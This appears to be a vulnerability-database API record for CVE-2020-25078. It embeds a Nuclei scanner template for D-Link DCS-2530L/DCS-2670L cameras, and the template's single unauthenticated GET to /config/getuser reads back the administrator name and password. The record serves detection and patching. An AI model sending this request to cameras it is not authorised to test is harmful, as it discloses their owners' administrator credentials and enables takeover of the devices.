{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-25078/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-25078/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-25078/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-25078/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-25078/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-25078"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-25078"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-25078.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2020-25078\n\ninfo:\n  name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure\n  author: pikpikcu\n  severity: high\n  description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the  /config/getuser endpoint allows for remote administrator password disclosure.\n  impact: |\n    An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera.\n  remediation: |\n    Update the camera firmware to the latest version to fix the vulnerability.\n  reference:\n    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180\n    - https://twitter.com/Dogonsecurity/status/1273251236167516161\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-25078\n    - https://github.com/pen4uin/vulnerability-research-list\n    - https://github.com/ArrestX/--POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2020-25078\n    epss-score: 0.97511\n    epss-percentile: 0.99899\n    cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: dlink\n    product: dcs-2530l_firmware\n  tags: cve,cve2020,dlink,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/config/getuser?index=0\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"name=\"\n          - \"pass=\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"text/plain\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100b0bc3fe82524c354a9c64e2fe8eeb7a39c823bb9aec77ea365f54e7a28d2f4a902202a8765cca660404bea6e1a8e211c8baaf628439f7db1bf061913944ac3673192:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-25078"
}